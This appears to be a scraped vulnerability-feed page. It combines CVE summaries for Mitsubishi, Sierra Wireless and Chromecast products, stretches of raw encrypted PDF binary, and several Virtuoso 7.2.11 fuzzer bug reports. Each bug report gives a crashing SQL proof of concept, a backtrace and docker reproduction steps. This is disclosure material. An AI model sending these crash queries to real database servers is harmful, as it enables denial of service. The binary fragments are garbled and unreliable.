Improper Input Validation vulnerability in simulation function of GX Works2 allows an attacker to cause a denial-of-service (DoS) condition on the function by sending specially crafted packets. However, the attacker would need to send the packets from within the same personal computer where the function is running.


%PDF-1.7 %���� 83 0 obj <> endobj 102 0 obj <>/Encrypt 84 0 R/Filter/FlateDecode/ID\[<776DE55659435E4F89CA5894BB8A9F61><6F6589E2F5825249A248B30EE43FE1A5>\]/Index\[83 28\]/Info 82 0 R/Length 96/Prev 109535/Root 85 0 R/Size 111/Type/XRef/W\[1 3 1\]>>stream h�bbd\`\`\`b\`\`�&��H�5\`RD2����A$�9X����#�,���7) 6� H2�4�j� �@��0��� �\*��u���A endstream endobj startxref 0 %%EOF 110 0 obj <>stream �Q��8r�� yS��a�eօ��H�^��u��6�7�vD�'A���% ��S\[LR���5�MQ�P�ԗ���������g��� ���p\\�z��ƛ���on#�8�^8 endstream endobj 84 0 obj <>>>/Filter/Standard/Length 256/O(��A������7W�\\n!�J�#O�.pP���Yw��z��I���t�)/OE(|�,�0R%\$B�ô�����aS26\$�ٹ���})/P -1324/Perms(�\\)ɐr��8\\\\o��.�)/R 6/StmF/StdCF/StrF/StdCF/U(� �7RvW�"���X��4Y�"-.�R\\)��Ҝ>�L�0Ἴ!Y��\\n)/UE(���|�d��#�1A+��H��\\\\F�@Q���,�')/V 5>> endobj 85 0 obj <>/Metadata 2 0 R/PageLayout/OneColumn/Pages 81 0 R/StructTreeRoot 6 0 R/Type/Catalog/ViewerPreferences<>>> endobj 86 0 obj <>/ProcSet\[/PDF/Text\]>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>> endobj 87 0 obj <>stream ��J�Tz��\_����d��2,G��3�t� �|B�T 2�q�g�e��0Q ��qM���/{ X�u 6|�5?�c(�E0å.���g�W����$�<�\_:�&Aqta��qo���-�,�y���cP�\\Kp�m�kғp�� �9%���L-Ӗ��m�K�n�\\�\[TVW�rʛ�u�M�NY�kz���,���Y6�FC#���o�F%Ui�x1�$G}�P�<�u�R2+���:�gu}�Khj���'"���"�$J�fn�Z Iq����n��%���A&n�\\⥦����̨p���� ���1�YDb\_d�7�ۧ�����h��6����S#;^N���ߥ�$�i��CH� b i�)XO� �2�x6\\��\_��t9��t��4DJ����YY�\[��� ��(�K�y�{T.�z�k�;�y�T%�� �}�y����\`7��3P2��D�uMͲf�V�:�T ���D��Xw&��2��5�Y����?�� Q,G�t6I�Tj�� Wj����r�\]\]�W,�k�>�(�Cj ���Q��³Ш5�Œ~�+�3%i�eK"��\`�TuI�Gl��+�\_ ��q��=���(�P�$͆��aQQF���y���% �%�����r����(��:� endstream endobj 88 0 obj <>stream RV�XelJL���sn3�\[ ��i4�W�˪�<:b��a�9c��+�?�һυI{\`�QF$kҼ����qTm��$(�vu�>x��~��j��N&W���Kt�n�(�=�ѧJ����X~E����cȖ�(V\_������m���硫ߋ� w&u�>æ2��í�1e�{�\*E�W :����!��d�g�L��iv�G���#TL��x8�H}mIlRG�51m���z8��9�J�D#��������v���.�-m�T�֤8CS��E^vHD�u��m&za���\[����ǃ��?�8v���>>\]�L\_�\*I�pNl����)��O;�;ũ�ge���?2�.�0��"�\*4���$�\]�<�h7�F�Q��,�o�+955��KUj�Y�ڔ���gs|=|�^Z��:������� K⒮QN��b7��s�)���Z���;��2�J|�t��;���UЅ�Z��󷠃H(��~^�D�y�245gƟt|��2��:���R�����Y4%GsWh���\*%�������%g\_������#$�ϼ��%��zM\]��\_�@\`R��G��AYxo8�"�S���ag��lt�#Fh�"����$c��w=�J��4�=�o~,aXM�R �Tzx�Dk�Z�:0��П9��$�k�SB'%i���U򓏘�v�'�a�@�2\\�M���s�M�\]��#�����G������M�ijk��Z�۶��q'6֒���� �\]�0}VvN"��h\\��|����;\*����Զ(�0X\`q9�̢��\]�WN�wk �M@�k��n^t�\`�|�.�+(9���� � ,��\[R�Ebd�3�����Z�������nll38�7���oF� ��A|r�ݡ��%�k<���d� �۰��h��T�z�K�U�H���i��!,G�\\�W���9'K����g.�qŕDܳC�%R���p�n8�� �FDg�u����͇ԈX�e������\[�ʆ D��.t��P3��=?��F���S &�֪�j�nR)��f�R!�8TW"w�+��5z<=:}Km

CVE-2023-5274

Malicious Code Execution Vulnerability due to External Control of File Name or Path in multiple Mitsubishi Electric FA Engineering Software Products allows a malicious attacker to execute a malicious code by having legitimate users open a specially crafted project file, which could result in information disclosure, tampering and deletion, or a denial-of-service (DoS) condition.

%PDF-1.7 %���� 130 0 obj <> endobj 149 0 obj <>/Encrypt 131 0 R/Filter/FlateDecode/ID\[<825692D6D984074F9C045089D0F29DBE><609F315DCF5233418FBA926DE672E6FF>\]/Index\[130 28\]/Info 129 0 R/Length 89/Prev 116528/Root 132 0 R/Size 158/Type/XRef/W\[1 2 1\]>>stream h�bbd\`\`b\`� "~ �� �H0�����A�v ��$X~���@����bq��01�e@��W�4#���������T� ���= endstream endobj startxref 0 %%EOF 157 0 obj <>stream �>�0>�����X��D��k�S��#v��m+W\*����� 5uHh����Q���^~7(�y� ����$�#�2����q�F2S��5�u���dۣ��\`b��Zb�uVN�;�bՎ�I���.$|���T��� endstream endobj 131 0 obj <>>>/Filter/Standard/Length 256/O(\]^b��N\\)r?v���:L/�gE�/��ɋ�>�J�8���S$�eH��� )/OE( \\\\U�Ԑ�>��\\\\�X;���04ؕ\[ڱ!\\r�T�)/P -1324/Perms(�0�1��!����y8��)/R 6/StmF/StdCF/StrF/StdCF/U(X2�DԘ>��B�����^�\\\\���f~!�o���Č\*O�����\[���)/UE(j����\_��+ \[�%��J�o ��x�:.j�)/V 5>> endobj 132 0 obj <>/Metadata 6 0 R/PageLayout/OneColumn/Pages 128 0 R/StructTreeRoot 11 0 R/Type/Catalog/ViewerPreferences<>>> endobj 133 0 obj <>/ProcSet\[/PDF/Text\]>>/Rotate 0/StructParents 0/Tabs/S/Type/Page>> endobj 134 0 obj <>stream c��\_�d\*m���m� ��R���#�5��R�?��ܮ��2~��@�z�X�$⥞� HU�{���ƻ�.�}�J��7Ȩǟ����������\_$K�(>��ū�3�JOu�Ҧ��!փZ�̋P�f�L5x���2�Dƭ�v�Zd��9:�������":P>/J���R,pa�:H��k:K�V? �K��')��5n4ٓ؎T�\`��V���kb�|�0|.v4�-�Yo<�. �\`;���( ���!|'b>��uNlp��W�\`k�mz�s�7@8T��שתּd����ڑ$����0F��2���J�h�$t��q�㑒�\`�"}��!!2i�q�oC���������&Cu<О+h��"�75���&����N�C��r�'�����9�َ;XA$�9;��i���=.� (�Hw��8���W�g���M5n��xH:�m��c҇���/�12Ʋ�4?^����rp΢�\[��V�x���\]N:�\]�V��Xp�C�bF�W �EpZ�ٕ  zr̍�ak\\�Jp�{w����X�Z,B�'���������ڿ���l��{ ��E�S��X\[�IW.@?�,d���:�xˮ�$����D�x �����~ endstream endobj 135 0 obj <>stream �mYp�J��9w�ME���\`s��#g����H�OAڂ�

CVE-2023-5247

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Sierra Wireless, Inc ALEOS could potentially allow a remote attacker to trigger a 
Denial of Service (DoS) condition for ACEManager without impairing 
other router functions. This condition is cleared by restarting the 
device.



CVE-2023-40458

_Published September 25, 2023 | Updated September 29, 2023_

The Chromecast Security Bulletin contains details of security vulnerabilities affecting supported Chromecast with Google TV devices (Chromecast devices). For Chromecast devices, security patch levels of 2023-07-01 or later address all applicable issues in the July 2023 Android Security Bulletin and all issues in this bulletin. To learn how to check a device's security patch level, see Chromecast firmware versions & release notes.

All supported Chromecast devices will receive an update to the 2023-07-01 patch level. We encourage all customers to accept these updates to their devices.

**Announcements**

*   In addition to the security vulnerabilities described in the July 2023 Android Security Bulletin, Chromecast devices also contain patches for the security vulnerabilities described below.

**Security patches**

Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated Android Open Source Project (AOSP) versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**AMLogic**

   

CVE

References

Severity

Subcomponent

CVE-2022-42536

A-258698524

High

Secure Monitor

CVE-2022-42537

A-258699189

High

Secure Monitor

CVE-2022-42541

A-258698507

High

Secure Monitor

CVE-2022-42538

A-258698938

High

Secure Monitor

CVE-2022-42540

A-258699554

High

Secure Monitor

CVE-2022-42539

A-258699550

High

Secure Monitor

**Functional patches**

For details on the new bug fixes and functional patches included in this release, refer to the Chromecast firmware versions & release notes.

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

Security patch levels of 2023-07-01 or later address all issues associated with the 2023-07-01 security patch level and all previous patch levels. To learn how to check a device's security patch level, read the instructions on the Chromecast firmware versions & release notes.

**2\. Why are security vulnerabilities split between this bulletin and the Android Security Bulletins?**

Security vulnerabilities that are documented in the Android Security Bulletins are required to declare the latest security patch level on Android devices. Additional security vulnerabilities, such as those documented in this bulletin are not required for declaring a security patch level.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column.

**Versions**

  

Version

Date

Notes

1.0

September 25, 2023

1.1

September 29, 2023

Added AMLogic CVEs

CVE-2022-42541: Chromecast Security Bulletin—September 2023

A stack overflow in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 DECIMAL ) ; 
  INSERT INTO v0 VALUES ( 0 ) ; 
  INSERT INTO v0 ( v1 ) SELECT CASE v1 WHEN 49 THEN v1 ELSE \-128 END FROM v0 AS v2 , v0 , v0 AS v3 GROUP BY v1 , v1 ; 
  UPDATE v0 SET v1 \= ( SELECT DISTINCT \* FROM v0 ) ; 

Server Log:

    14:21:24 HTTP/WebDAV server online at 8890
    14:21:24 Server online at 1111 (pid 1)
    *** stack smashing detected ***: terminated
    

Due to the stack smashing, I failed to retrieve the correct backtrace.

ways to reproduce (write poc to the file '/tmp/test.sql' first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48945: Fuzzer: Virtuoso 7.2.11 crashed by stack smashing · Issue #1172 · openlink/virtuoso-opensource

An issue in the box_mpy function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT ) ; 
  INSERT INTO v0 VALUES ( 2147483647 ) ; 
  INSERT INTO v0 VALUES ( \-1 ) ; 
  INSERT INTO v0 ( v1 , v1 , v1 ) SELECT 54 , v1 , \-128 FROM v0 AS v4 , v0 , v0 AS v3 NATURAL JOIN v0 AS v2 ; 
  UPDATE v0 SET v1 \= NULL WHERE ( v1 \* 2147483647 , CASE WHEN v1 \= 'x' THEN 75 WHEN DENSE\_RANK ( 'x' ) THEN 25942677.000000 END + 16 \* 127 ) IN ( SELECT v1 FROM v0 WHERE v1 \>= 127 AND ( v1 \* 16 , v1 , ( SELECT v1 FROM v0 WHERE ( v1 , v1 ) IN ( SELECT v1 , v1 AS v8 FROM v0 AS v6 NATURAL JOIN v0 AS v7 NATURAL JOIN v0 AS v5 NATURAL JOIN v0 WHERE v1 ) ORDER BY v1 ) ) \- 'x' GROUP BY 48002391.000000 ) ; 

backtrace:

#0 0xc201b3 (box\_mpy+0x83)
#1 0x754c6e (code\_vec\_run\_v+0x19be)
#2 0x7b86bb (end\_node\_input+0x13b)
#3 0x7af05e (qn\_input+0x3ce)
#4 0x7af78f (qn\_ts\_send\_output+0x23f)
#5 0x7b509e (table\_source\_input+0x16ee)
#6 0x7af05e (qn\_input+0x3ce)
#7 0x44c979 (chash\_fill\_input+0x589)
#8 0x5370af (hash\_fill\_node\_input+0xef)
#9 0x7af05e (qn\_input+0x3ce)
#10 0x7af4c6 (qn\_send\_output+0x236)
#11 0x44c52e (chash\_fill\_input+0x13e)
#12 0x5370af (hash\_fill\_node\_input+0xef)
#13 0x7af05e (qn\_input+0x3ce)
#14 0x7af4c6 (qn\_send\_output+0x236)
#15 0x44c52e (chash\_fill\_input+0x13e)
#16 0x5370af (hash\_fill\_node\_input+0xef)
#17 0x7af05e (qn\_input+0x3ce)
#18 0x7af4c6 (qn\_send\_output+0x236)
#19 0x8214bd (set\_ctr\_vec\_input+0x99d)
#20 0x7af05e (qn\_input+0x3ce)
#21 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#22 0x7ce602 (sf\_sql\_execute+0x15d2)
#23 0x7cecde (sf\_sql\_execute\_w+0x17e)
#24 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#25 0xe214bc (future\_wrapper+0x3fc)
#26 0xe28dbe (\_thread\_boot+0x11e)
#27 0x7fa2b8a15609 (start\_thread+0xd9)
#28 0x7fa2b87e5133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48946: Fuzzer: Virtuoso 7.2.11 crashed at box_mpy · Issue #1178 · openlink/virtuoso-opensource

An issue in the cha_cmp function of openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 INT ) ;
 INSERT INTO v0 ( v1 , v1 , v1 ) VALUES ( 77 , \-128 , \-1 ) ;
 INSERT INTO v0 VALUES ( 4 ) ;
 SELECT CASE \-128 / 56 WHEN v1 THEN 20 ELSE v1 + \-2147483648 END , v1 FROM v0 UNION SELECT 19 , 0 \* v1 FROM v0 GROUP BY v1 ;

backtrace:

#0 0x42c769 (cha\_cmp+0x69)
#1 0x4339cf (setp\_chash\_distinct\_run+0x1dcf)
#2 0x434478 (setp\_chash\_distinct+0x3b8)
#3 0x63bdc3 (setp\_node\_run+0xe3)
#4 0x63cc23 (setp\_node\_input+0x33)
#5 0x7af05e (qn\_input+0x3ce)
#6 0x7af78f (qn\_ts\_send\_output+0x23f)
#7 0x437069 (chash\_read\_input+0x1029)
#8 0x7af05e (qn\_input+0x3ce)
#9 0x7af4c6 (qn\_send\_output+0x236)
#10 0x7af05e (qn\_input+0x3ce)
#11 0x63d1c3 (union\_node\_input+0x1d3)
#12 0x7518c7 (qr\_resume\_pending\_nodes+0x197)
#13 0x751c9a (subq\_next+0x1ba)
#14 0x821acb (subq\_node\_vec\_input+0x2eb)
#15 0x7af05e (qn\_input+0x3ce)
#16 0x7af4c6 (qn\_send\_output+0x236)
#17 0x8214bd (set\_ctr\_vec\_input+0x99d)
#18 0x7af05e (qn\_input+0x3ce)
#19 0x7c084b (qr\_exec+0x11db)
#20 0x7ce1d6 (sf\_sql\_execute+0x11a6)
#21 0x7cecde (sf\_sql\_execute\_w+0x17e)
#22 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#23 0xe214bc (future\_wrapper+0x3fc)
#24 0xe28dbe (\_thread\_boot+0x11e)
#25 0x7f14fb425609 (start\_thread+0xd9)
#26 0x7f14fb1f5133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48947: Fuzzer: Virtuoso 7.2.11 crashed at cha_cmp · Issue #1179 · openlink/virtuoso-opensource

An issue in the box_col_len function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

    CREATE TABLE v0 ( v1 nvarchar ) ; 
     INSERT INTO v0 VALUES ( 1 ) ; 
     INSERT INTO v0 SELECT MAX ( DISTINCT v1 ) FROM v0 ; 
     INSERT INTO v0 SELECT v1 FROM v0 WHERE ( SELECT ( SELECT v1 FROM v0 ) ) ; 
    

backtrace:

    #0 0x86df90 (box_col_len+0x90)
    #1 0x88c0af (key_vec_insert+0x9df)
    #2 0x7b679b (insert_node_run+0x8fb)
    #3 0x7b6b1c (insert_node_input+0x11c)
    #4 0x7af05e (qn_input+0x3ce)
    #5 0x7af78f (qn_ts_send_output+0x23f)
    #6 0x7b509e (table_source_input+0x16ee)
    #7 0x7af05e (qn_input+0x3ce)
    #8 0x7af4c6 (qn_send_output+0x236)
    #9 0x8214bd (set_ctr_vec_input+0x99d)
    #10 0x7af05e (qn_input+0x3ce)
    #11 0x7c1be9 (qr_dml_array_exec+0x839)
    #12 0x7ce602 (sf_sql_execute+0x15d2)
    #13 0x7cecde (sf_sql_execute_w+0x17e)
    #14 0x7d799d (sf_sql_execute_wrapper+0x3d)
    #15 0xe214bc (future_wrapper+0x3fc)
    #16 0xe28dbe (_thread_boot+0x11e)
    #17 0x7ff3d19ba609 (start_thread+0xd9)
    #18 0x7ff3d178a133 (clone+0x43)
    

ways to reproduce (write poc to the file /tmp/test.sql first):

    # remove the old one
    docker container rm virtdb_test -f
    # start virtuoso through docker
    docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
    # wait the server starting
    sleep 10
    # check whether the simple query works
    echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
    # run the poc
    cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba

CVE-2023-48950: Fuzzer: Virtuoso 7.2.11 crashed at box_col_len · Issue #1174 · openlink/virtuoso-opensource

An issue in the box_equal function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 SMALLINT CHECK ( CONTAINS ( 'del' , 'reabbreviating' , 'diamonds' ) ) ) ; 

backtrace:

#0 0xdeab6a (box\_equal+0xba)
#1 0x773df3 (sqlo\_cname\_ot+0x53)
#2 0x6e0161 (sqlo\_df+0x461)
#3 0x6e0d6c (sqlo\_df+0x106c)
#4 0x6e067f (sqlo\_df+0x97f)
#5 0x70ea77 (sqlo\_top\_2+0x267)
#6 0x70e4a5 (sqlo\_top\_1+0x135)
#7 0x70ffa6 (sqlo\_top\_select+0x156)
#8 0x6b9b6f (sql\_stmt\_comp+0x8bf)
#9 0x6bc9d2 (sql\_compile\_1+0x1a62)
#10 0x4e213f (ddl\_table\_check\_constraints\_define\_triggers+0x1af)
#11 0x4e462d (ddl\_table\_constraints+0xd0d)
#12 0x4e5331 (sql\_ddl\_node\_input\_1+0xbc1)
#13 0x4e57ee (sql\_ddl\_node\_input+0x10e)
#14 0x7bcb0b (ddl\_node\_input\_1+0x19b)
#15 0x7bd1e7 (qn\_without\_ac\_at+0xc7)
#16 0x7af05e (qn\_input+0x3ce)
#17 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#18 0x7ce602 (sf\_sql\_execute+0x15d2)
#19 0x7cecde (sf\_sql\_execute\_w+0x17e)
#20 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#21 0xe214bc (future\_wrapper+0x3fc)
#22 0xe28dbe (\_thread\_boot+0x11e)
#23 0x7f4182517609 (start\_thread+0xd9)
#24 0x7f41822e7133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

CVE-2023-48951: Fuzzer: Virtuoso 7.2.11 crashed at box_equal · Issue #1177 · openlink/virtuoso-opensource

An issue in the box_add function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE v0 ( v1 FLOAT UNIQUE , v2 INT ) ;
 INSERT INTO v0 VALUES ( NULL , 57 ) ;
 INSERT INTO v0 VALUES ( \-1 , ( SELECT 60 , v2 FROM v0 WHERE v2 \= \-1 ) ) ;
 UPDATE v0 SET v1 \= ( CASE WHEN v2 \* v1 THEN 76 ELSE ( SELECT v2 FROM v0 WHERE v1 \= \-2147483648 / CASE WHEN v2 \= ( SELECT v1 FROM v0 WHERE ( CASE WHEN v2 \= v2 AND v2 \= v2 AND v2 THEN v2 + v1 \* \-128 + 48100742.000000 END ) IN ( SELECT v1 FROM v0 WHERE v2 BETWEEN 'x' AND 'x' OR ( CASE WHEN v2 \= 16 THEN 46 ELSE v1 + ( 69175744.000000 , 10962973.000000 ) / 36 + 5 END ) GROUP BY 'x' ) ORDER BY v2 / 45 DESC ) THEN 32232158.000000 END ) END ) ;

backtrace:

#0 0xc1e333 (box\_add+0x83)
#1 0x75e0ba (code\_vec\_run\_no\_catch+0xe5a)
#2 0x8966e5 (itc\_vec\_row\_check+0x8e5)
#3 0x617353 (itc\_page\_search+0xc13)
#4 0x61345f (itc\_search+0x84f)
#5 0x896de4 (itc\_vec\_next+0x364)
#6 0x7b2565 (ks\_start\_search+0xf75)
#7 0x7b434e (table\_source\_input+0x99e)
#8 0x7af05e (qn\_input+0x3ce)
#9 0x44c979 (chash\_fill\_input+0x589)
#10 0x5370af (hash\_fill\_node\_input+0xef)
#11 0x7af05e (qn\_input+0x3ce)
#12 0x7af4c6 (qn\_send\_output+0x236)
#13 0x8214bd (set\_ctr\_vec\_input+0x99d)
#14 0x7af05e (qn\_input+0x3ce)
#15 0x7c1be9 (qr\_dml\_array\_exec+0x839)
#16 0x7ce602 (sf\_sql\_execute+0x15d2)
#17 0x7cecde (sf\_sql\_execute\_w+0x17e)
#18 0x7d799d (sf\_sql\_execute\_wrapper+0x3d)
#19 0xe214bc (future\_wrapper+0x3fc)
#20 0xe28dbe (\_thread\_boot+0x11e)
#21 0x7f7e10239609 (start\_thread+0xd9)
#22 0x7f7e10009133 (clone+0x43)

ways to reproduce (write poc to the file /tmp/test.sql first):

# remove the old one
docker container rm virtdb\_test -f
# start virtuoso through docker
docker run --name virtdb\_test -itd --env DBA\_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
# wait the server starting
sleep 10
# check whether the simple query works
echo "SELECT 1;" | docker exec -i virtdb\_test isql 1111 dba
# run the poc
cat /tmp/test.sql | docker exec -i virtdb\_test isql 1111 dba

Tag

#dos